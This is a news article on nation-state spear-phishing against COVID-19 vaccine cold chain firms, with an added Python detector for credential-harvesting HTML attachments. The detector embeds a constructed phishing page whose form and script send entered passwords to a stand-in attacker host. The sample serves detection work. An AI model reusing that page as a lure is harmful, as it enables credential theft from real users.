Threat Groups Still Target COVID-19 Vaccine Cold Chain

Advanced persistent threat groups continue to target the worldwide COVID-19 vaccine cold chain, according to an updated IBM Security X-Force report. X-Force researchers published a report in December 2020 warning that threat actors were targeting the COVID-19 cold chain to gain access to vaccine-related information, and the attacks remain a serious threat to the distribution and storage of vaccines.

There are currently more than 350 logistics partners involved in the cold chain that distributes vaccines and keeps them at the required low temperatures. Since the initial report on cold chain phishing attacks was released, IBM X-Force researchers have uncovered an additional 50 email files linked to the spear-phishing campaign and have identified 44 targeted organizations in 14 countries across Europe, Asia, Africa, and the Americas.

The targeted companies support the transport, warehousing, storage, and distribution of COVID-19 vaccines. The most heavily targeted organizations operate in transportation, IT and electronics, and healthcare, including biomedical research firms, medical equipment manufacturers, and pharmaceutical and hygiene product suppliers.

Threat actors, believed to be nation-state sponsored, have expanded their campaign and are using spear-phishing emails to steal the account credentials of CEOs, global sales officers, purchasing managers, HR officers, plant engineering managers, and others. The goal is privileged insight into national Advance Market Commitment (AMC) negotiations for vaccine purchases, distribution timelines, data on the transit of vaccines through countries and territories, World Trade Organization (WTO) trade facilitation agreements, export controls and international property rights, technical vaccine data, and other sensitive information.

The threat group behind this campaign appears to have a thorough understanding of the vaccine cold chain. The spear-phishing emails impersonate an account manager at Haier Biomedical, a Chinese biomedical company described in the report as the world's only complete cold chain supplier.

The emails request price quotes for service contracts connected to the Cold Chain Equipment Optimization Platform (CCEOP) program and reference Haier Biomedical products such as an ice-lined refrigerator and a solar-powered vaccine refrigerator. The emails also mention companies involved in petrochemical manufacturing and solar panel production that are consistent with those products, and the language used matches the academic background claimed in the forged signature block.

The emails carry malicious HTML attachments that are rendered locally in the recipient's browser; the page prompts the user to enter their login credentials to view the file. Any credentials entered are harvested and sent to the attacker's command-and-control server.
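The attachment-based lure described above can be checked for statically before it ever reaches a user: a self-contained HTML file that contains a password field and submits (via a form action or script) to a host the organisation does not authenticate to is the credential-harvesting pattern. The following Python script is an added example, not code from the IBM X-Force report; the trusted-host list, the heuristics, and the two embedded sample attachments (a constructed phishing page and a constructed benign page) are assumptions for illustration.

```python
"""Scan HTML email attachments for credential-harvesting indicators.

Added example (not from the IBM X-Force report). Flags an HTML file that
renders a login prompt locally and posts the input to an untrusted host.
All heuristics, hosts and sample documents below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organisation legitimately signs in to (assumption for the example).
TRUSTED_HOSTS = {"login.microsoftonline.com", "sso.example.com"}

_URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


class _FormInspector(HTMLParser):
    """Collect password inputs, form actions and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", "") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser delivers <script> bodies through handle_data as CDATA.
        if self._in_script:
            self.scripts.append(data)


def external_hosts(urls):
    """Return the set of hostnames in `urls` that are not in TRUSTED_HOSTS."""
    hosts = set()
    for u in urls:
        host = urlparse(u).hostname
        if host and host.lower() not in TRUSTED_HOSTS:
            hosts.add(host.lower())
    return hosts


def scan_attachment(html):
    """Return findings for one HTML attachment, including a 'suspicious' verdict."""
    p = _FormInspector()
    p.feed(html)
    # Form submissions and any absolute URLs that inline scripts talk to.
    urls = [a for a in p.form_actions if a.lower().startswith("http")]
    for s in p.scripts:
        urls.extend(_URL_RE.findall(s))
    ext = external_hosts(urls)
    findings = {
        "password_fields": p.password_fields,
        "external_hosts": sorted(ext),
        "script_exfil": any(_URL_RE.search(s) for s in p.scripts),
    }
    # A locally rendered page that asks for a password and sends it to a host
    # outside the trusted set matches the cold chain campaign's technique.
    findings["suspicious"] = p.password_fields > 0 and bool(ext)
    return findings


# Constructed sample: a lure themed on the CCEOP quotation pretext. The domain
# docs-portal.example.net stands in for an attacker-controlled C2 host.
SAMPLE_PHISH = """<html><body>
<h3>Quotation_CCEOP_Service_Contract.pdf</h3>
<p>Sign in with your corporate e-mail to view this document.</p>
<form id="f" method="POST" action="https://docs-portal.example.net/verify.php">
 <input type="text" name="email"><input type="password" name="pass">
 <input type="submit" value="Open"></form>
<script>
document.getElementById('f').onsubmit=function(){fetch('https://docs-portal.example.net/c2',{method:'POST',body:new FormData(this)});};
</script></body></html>"""

# Constructed sample: a benign attachment that only links to the trusted SSO host.
SAMPLE_BENIGN = """<html><body><h1>Monthly newsletter</h1>
<a href="https://sso.example.com/login">Log in</a>
<form action="https://sso.example.com/search"><input type="text" name="q"></form>
</body></html>"""


if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, scan_attachment(doc))
```

In a mail gateway this check would run on every `text/html` attachment before delivery; the trusted-host list is the only site-specific input, and anything flagged should be quarantined and the submission host added to the block list.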

The researchers noted that while their earlier reporting described direct targeting of supranational organizations and of the energy and IT sectors in six countries, the expanded target set is consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat.

Given vaccine nationalism and global competition for access to vaccines, attacks on the cold chain were all but inevitable. Although the researchers could not attribute the campaign to a specific group, it is most likely a nation-state operation.

Disruption of the cold chain can delay vaccine shipments or compromise the temperature conditions required to transport and store vaccines safely, potentially rendering them unsafe or ineffective. IBM has published indicators of compromise (IOCs) in its report to help organizations in the COVID-19 cold chain defend against these attacks.